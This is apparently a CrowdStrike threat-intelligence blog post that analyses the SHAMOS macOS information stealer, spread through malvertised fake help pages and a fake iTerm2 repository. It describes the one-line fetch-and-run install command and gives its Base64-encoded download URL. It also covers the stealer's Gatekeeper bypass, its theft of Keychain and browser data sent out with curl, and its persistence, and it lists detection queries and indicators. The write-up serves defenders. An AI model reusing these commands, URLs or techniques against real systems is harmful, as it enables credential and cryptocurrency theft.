Falcon Platform Prevents COOKIE SPIDER’s SHAMOS Delivery on macOS | CrowdStrike BLOG Featured Now Live: The CrowdStrike 2026 Financial Services Threat Landscape Report May 14, 2026 Falcon AIDR Detects Threats at the Prompt Layer in Kubernetes AI Applications May 13, 2026 May 2026 Patch Tuesday: 30 Critical Vulnerabilities Among 130 CVEs May 12, 2026 Inside CrowdStrike Automated Leads: A Transformative Approach to Threat Detections May 11, 2026 Recent Video Video Highlights the 4 Key Steps to Successful Incident Response Dec 02, 2019 Helping Non-Security Stakeholders Understand ATT&CK in 10 Minutes or Less [VIDEO] Feb 21, 2019 Analyzing Targeted Intrusions Through the ATT&CK Framework Lens [VIDEO] Jan 22, 2019 Qatar’s Commercial Bank Chooses CrowdStrike Falcon®: A Partnership Based on Trust [VIDEO] Aug 20, 2018 Category Agentic SOC How Charlotte AI AgentWorks Fuels Security's Agentic Ecosystem 03/25/26 CrowdStrike Services and Agentic MDR Put the Agentic SOC in Reach 03/24/26 4 Ways Businesses Use CrowdStrike Charlotte AI to Transform Security Operations 03/12/26 Inside the Human-AI Feedback Loop Powering CrowdStrike’s Agentic Security 02/10/26 Cloud & Application Security 05/13/26 CrowdStrike Named a Leader in Frost & Sullivan 2026 Radar for Cloud-Native Application Protection Platforms 04/27/26 CrowdStrike Expands Real-Time Cloud Detection and Response to Google Cloud 04/22/26 CrowdStrike Falcon Cloud Security Delivered 264% ROI Through Unified Cloud Protection Threat Hunting & Intel 05/14/26 CrowdStrike Named a Leader in the First-Ever Gartner® Magic Quadrant™ for Cyberthreat Intelligence Technologies 05/06/26 CrowdStrike Launches Falcon OverWatch for Defender 05/05/26 Tune In: The Future of AI-Powered Vulnerability Discovery 05/01/26 Endpoint Security & XDR 05/11/26 CrowdStrike Falcon Platform Achieves 441% ROI in Three Years 04/21/26 Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management 04/01/26 Enhanced Network Visibility: A Dive into the Falcon macOS Sensor's New Capabilities 03/11/26 Engineering & Tech EMBER2024: Advancing the Training of Cybersecurity ML Models Against Evasive Malware 09/03/25 Falcon Platform Prevents COOKIE SPIDER’s SHAMOS Delivery on macOS 08/20/25 CrowdStrike’s Approach to Better Machine Learning Evaluation Using Strategic Data Splitting 08/11/25 CrowdStrike Researchers Develop Custom XGBoost Objective to Improve ML Model Release Stability 03/20/25 Executive Viewpoint Frontier AI Is Collapsing the Exploit Window.
Here’s How Defenders Must Respond. 04/20/26 Frontier AI for Defenders: CrowdStrike and OpenAI TAC 04/16/26 Anthropic Claude Mythos Preview: The More Capable AI Becomes, the More Security It Needs 04/06/26 The Architecture of Agentic Defense: Inside the Falcon Platform 01/16/26 From The Front Lines CrowdStrike Technical Risk Assessments Reveal Common Exposure Patterns 05/04/26 Introducing the CrowdStrike Shadow AI Visibility Service CrowdStrike Flex for Services Expands Access to Elite Security Expertise From Scanner to Stealer: Inside the trivy-action Supply Chain Compromise 03/20/26 Next-Gen Identity Security Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse 03/31/26 CrowdStrike FalconID Brings Phishing-Resistant MFA to Falcon Next-Gen Identity Security 02/26/26 CrowdStrike Named a Customers’ Choice in 2026 Gartner® Peer Insights™ Voice of the Customer for User Authentication 02/12/26 CrowdStrike to Acquire Seraphic to Secure Work in Any Browser 01/13/26 Next-Gen SIEM & Log Management Falcon Next-Gen SIEM Supports Third-Party EDR Tools, Starting with Microsoft Defender 03/23/26 Falcon Next-Gen SIEM Simplifies Onboarding with Sensor-Native Log Collection 03/06/26 Exposing Insider Threats through Data Protection, Identity, and HR Context 02/18/26 How to Scale SOC Automation with Falcon Fusion SOAR 02/11/26 Public Sector CrowdStrike Innovates to Modernize National Security and Protect Critical Systems 03/18/26 Falcon Platform for Government Now Offers Falcon for XIoT to Secure Connected Assets CrowdStrike Achieves FedRAMP® High Authorization 03/19/25 NHS Matures Healthcare Cybersecurity with NCSC’s CAF Assurance Model 03/13/25 Exposure Management 05/12/26 April 2026 Patch Tuesday: Two Zero-Days and Eight Critical Vulnerabilities Among 164 CVEs 04/14/26 How CrowdStrike Is Accelerating Exposure Evaluation as Adversaries Gain Speed 04/05/26 March 2026 Patch Tuesday: Eight Critical Vulnerabilities and Two Publicly Disclosed Among 82 CVEs Patched 03/10/26 Securing AI CrowdStrike Expands ChatGPT Enterprise Integration with Enhanced Audit Logging and Activity Monitoring 04/28/26 New CrowdStrike Innovations Secure AI Agents and Govern Shadow AI Across Endpoints, SaaS, and Cloud Secure Homegrown AI Agents with CrowdStrike Falcon AIDR and NVIDIA NeMo Guardrails 03/19/26 Introducing "AI Unlocked: Decoding Prompt Injection," a New Interactive Challenge Data Security Falcon Data Security Secures Data Wherever It Lives and Moves Falcon Data Protection for Cloud Extends DSPM into Runtime 11/20/25 CrowdStrike Stops GenAI Data Leaks with Unified Data Protection 09/18/25 Q&A: How Mastronardi Produce Secures Innovation with CrowdStrike 02/14/25 Start Free Trial August 20, 2025 Maddie Stewart - Suweera De Souza - Ash Leslie - Doug Brown Engineering & Tech • Between June and August 2025, the CrowdStrike Falcon® platform successfully blocked a sophisticated malware campaign that attempted to compromise over 300 customer environments.
The campaign deployed SHAMOS , a variant of Atomic macOS Stealer (AMOS) developed by the cybercriminal group COOKIE SPIDER. Operating as malware-as-a-service, COOKIE SPIDER rents this information stealer to cybercriminals who deploy it to harvest sensitive information and cryptocurrency assets from victims. The campaign utilized malvertising to direct users to fraudulent macOS help websites where victims were instructed to execute a malicious one-line installation command.
This campaign underscores the popularity of malicious one-line installation commands among eCrime actors. This technique allows them to bypass Gatekeeper security checks and install the Mach-O executable directly onto victim devices. Cuckoo Stealer SHAMOS operators have previously leveraged this method in Homebrew malvertising campaigns occurring between May 2024 and January 2025. Details In an exemplar campaign from June 2025, when the victim searches for a macOS-related issue — for example, “macos flush resolver cache” — they receive a promoted malvertising website in their search results (Figure 1).
Users located in multiple countries — including the U.S., UK, Japan, China, Colombia, Canada, Mexico, Italy, and others — received these advertisements; no victims were located in Russia. This is likely due to the fact that Russian eCrime forums prohibit commodity malware operators from targeting users based in Russia and other countries belonging to the Commonwealth of Independent States (CIS). Figure 1.
Screenshot of search engine results with promoted malvertising website One Google Advertising profile promoting this spoofed macOS help website appears to be a legitimate Australia-based electronics store, suggesting the eCrime actors responsible are likely spoofing the store name in their Google Advertising profile. This assessment is made with moderate confidence, as this profile’s promoted advertisement URLs appear to relate to macOS help pages — mac-safer[.]com rescue-mac[.]com — and therefore do not align with the legitimate store’s business operations (Figure 2).
Figure 2. Google advertising profile The fake help pages provide victims with false instructions for how to fix their problem (Figure 3). Figure 3. False instructions displayed on macOS help pages Both malvertising websites instruct the victims to copy, paste, and execute the following command in Terminal (Figure 4): Figure 4. Malicious one-line installation command displayed on malvertising websites The command decodes the Base64-encoded string aHR0cHM6Ly9pY2xvdWRzZXJ2ZXJzLmNvbS9nbS9pbnN0YWxsLnNo and downloads a file from https[:]//icloudservers[.]com/gm/install[.]sh .
This file is a Bash script that captures the user’s password and downloads a Mach-O executable from https[:]//icloudservers[.]com/gm/update (Figure 5). Figure 5. Bash script contents Since first reporting on this type of campaign in June 2025, CrowdStrike Counter Adverary Operations has continued to observe opportunistic eCrime threat actors leveraging malicious GitHub repositories to prompt victims to execute commands that download SHAMOS .
Similar to the aforementioned activity, campaign operators allege to offer a free download of a tool designed for macOS; these tools involve video editing software, computer-aided design (CAD) products, macOS performance tools, AI software, and dictation software. The threat actor(s) behind these pages continue to use the malicious one-line command to install SHAMOS . In some cases, the command is written entirely in plain text, and in others, the URL that hosts is Base64-encoded (Figure 6).
Figure 6. Samples of malicious one-line installation commands displayed on malvertising websites throughout July and August 2025 Installation/Execution The malicious installation command downloads Mach-O into the /tmp/ directory, removes extended file attributes using xattr likely for bypassing Gatekeeper checks, assigns executable permissions via chmod , and then executes the stealer. executes anti-VM commands to verify that the Mach-O is not executing in a suspected sandbox environment.
The stealer then executes a variety of AppleScript commands for host reconnaissance and data collection tasks, including searching for known cryptocurrency-related wallet files and sensitive credential-based files on disk. attempts to exfiltrate collected sensitive files, including data from Keychain, AppleNotes, and browsers, using curl to transmit the data in a ZIP archive named out.zip (Figure 7).
Figure 7. Falcon UI detection on the binary execution from tmp downloads additional malicious payloads, including a spoofed Ledger Live wallet application and a botnet module, to the victim’s home directory as hidden files and assigns them with executable permissions. The stealer also configures a Plist file named com.finder.helper.plist for persistence and saves it to the User’s LaunchDaemons directory if the victim has Sudo privileges.
CrowdStrike observed multiple commands, likely suggesting the eCrime actor was using SHAMOS ’s botnet module (Figure 8). Figure 8. Falcon UI detection demonstrating likely botnet module use Additional Reporting Open-source reporting detailed an additional malvertising campaign related to the observed activity. This campaign involved a GitHub repository masquerading as iTerm2’s GitHub repository, located at https[:]//github[.]com/jeryrymoore/Iterm2 , that contained instructions detailing how to download iTerm2, a terminal emulator for macOS (Figure 9). 1 The malicious one-line installation command is nearly identical to the command used in the malvertising campaign; however, the campaign’s Bash script host URL is not Base64-encoded.
The Bash script — retrieved from https[:]//macostutorial[.]com/iterm2/install[.]sh — downloads from https[:]//macostutorial[.]com/iterm2/update . Figure 9. GitHub repository containing fake iTerm2 installation instructions CrowdStrike Falcon Coverage CrowdStrike employs a layered approach for malware detection using machine learning and indicators of attack (IOAs). As shown in Figure 10, the CrowdStrike Falcon® sensor’s machine learning capabilities and behavior-based detection capabilities (IOAs) can automatically detect and prevent in the initial stages of the attack chain (i.e., as soon as the malware is downloaded onto the victim’s machine and at execution of the malicious shell script).
Additionally, IOAs can recognize malicious behavior at further stages in the attack chain, including when the threat actor attempts to employ tactics like data collection, persistence, execution of further binaries, and data exfiltration. Figure 10. Falcon UI detection on execution of Bash script Assessment This campaign highlights that leveraging malvertising and the one-line installation-command technique to distribute macOS information stealers remains popular among eCrime actors.
Promoting false malicious websites encourages more site traffic, which will lead to more potential victims. The one-line installation command enables eCrime actors to directly install the Mach-O executable onto the victim’s machine while bypassing Gatekeeper checks. CrowdStrike Counter Adversary Operations assesses that eCrime actors will likely continue to leverage both malvertising and one-line installation commands to distribute macOS information stealers.
This assessment is made with high confidence, as the combination has historically been successful, and these methods allow actors to bypass Gatekeeper checks. Recommended Prevention Settings To protect endpoints from this threat, CrowdStrike Falcon® Insight XDR customers should ensure the following prevention policy settings are configured: Suspicious process prevention Intelligence-sourced threat prevention Threat Hunting Queries The following CrowdStrike Falcon® Next-Gen SIEM Advanced Event Search queries are provided to assist defenders in hunting for this and similar activity across their endpoints.
NOTE: Make sure to update the Falcon URL to the cloud in which your environment is currently configured (US1, US2, EU, etc.) “Bash script execution with calls to risky LOOBINs” event_platform=Mac #event_simpleName=ScriptControlScanInfo ScriptContent="*dscl*curl*xattr*chmod*" | format("[GraphExplorer](https://falcon.crowdstrike.com/graphs/process-explorer/tree?id=pid:%s:%s)", field=["aid", "TargetProcessId"], as=GraphExplorer) | groupBy([aid, GraphExplorer, ScriptContent]) “AppleScript execution under a binary from /tmp/” event_platform=Mac #event_simpleName=ProcessRollup2 ImageFileName="*/tmp/*" | join({event_platform=Mac #event_simpleName=ProcessRollup2 ImageFileName="*osascript" CommandLine="*-e*" | rename(field="CommandLine", as="ChildCommandLine") | rename(field="ImageFileName", as="ChildImageFileName")}, field=TargetProcessId, key=ParentProcessId, include=["ChildImageFileName", "ChildCommandLine"], limit=20000) | groupBy([aid, GraphExplorer, ImageFileName, CommandLine, ChildImageFileName, ChildCommandLine]) “Curl with commandline indicative of data exfil” event_platform=Mac #event_simpleName=ProcessRollup2 FileName=curl CommandLine="*POST*out.zip*" | groupBy([aid, GraphExplorer, ImageFileName, CommandLine]) Indicators of Compromise (IOCs) IOC Description Malvertising websites containing instructions to download SHAMOS mac-safer[.]com https[:]//github[.]com/jeryrymoore/Iterm2 Bash script SHA256 hashes 231c4bf14c4145be77aa4fef36c208891d818983c520ba067dda62d3bbbf547f eb7ede285aba687661ad13f22f8555aab186debbadf2c116251cb269e913ef68 Mach-O SHA256 hashes 4549e2599de3011973fde61052a55e5cdb770348876abc82de14c2d99575790f b01c13969075974f555c8c88023f9abf891f72865ce07efbcee6c2d906d410d5 a4e47fd76dc8ed8e147ea81765edc32ed1e11cff27d138266e3770c7cf953322 Bash script host URLs https[:]//icloudservers[.]com/gm/install[.]sh host URLs https[:]//icloudservers[.]com/gm/update https[:]//macostutorial[.]com/iterm2/update MITRE ATT&CK Framework The following table maps reported COOKIE SPIDER and SHAMOS tactics, techniques, and procedures (TTPs) to the MITRE ATT&CK® framework.
ID Technique Description T1583.001 Acquire Infrastructure: Domains The eCrime actor registered fake macOS help websites T1189 Drive-by Compromise Malvertising distributes websites containing installation instructions T1204 User Execution SHAMOS requires the user to execute the malicious installer command T1027.010 Obfuscated Files or Information: Command Obfuscation The malicious command uses Base64-encoding to obfuscate the Bash script download URL T1105 Ingress Tool Transfer The malicious Bash script downloads from an external URL Additional Resources Learn how CrowdStrike’s Threat Intelligence and Hunting solutions are transforming security operations to better protect your business.
Tune into the Adversary Universe Podcast , where CrowdStrike experts discuss today’s threat actors — who they are, what they’re after, and how you can defend against them. Download the CrowdStrike 2025 Global Threat Report and CrowdStrike 2025 Threat Hunting Report . 1. The legitimate iTerm2 GitHub repository is located at https[:]//github[.]com/gnachman/iTerm2. Related Content CrowdStrike’s Journey in Customizing NVIDIA Nemotron Models for Peak Accuracy and Performance How CrowdStrike Trains GenAI Models at Scale Using Distributed Computing Categories CONNECT WITH US FEATURED ARTICLES May 06, 2026 May 05, 2026 SUBSCRIBE Sign up now to receive the latest notifications and updates from CrowdStrike.
Sign Up See CrowdStrike Falcon ® in Action Detect, prevent, and respond to attacks— even malware-free intrusions—at any stage, with next-generation endpoint protection. See Demo Privacy Request Info Contact Us 1.888.512.8906 Accessibility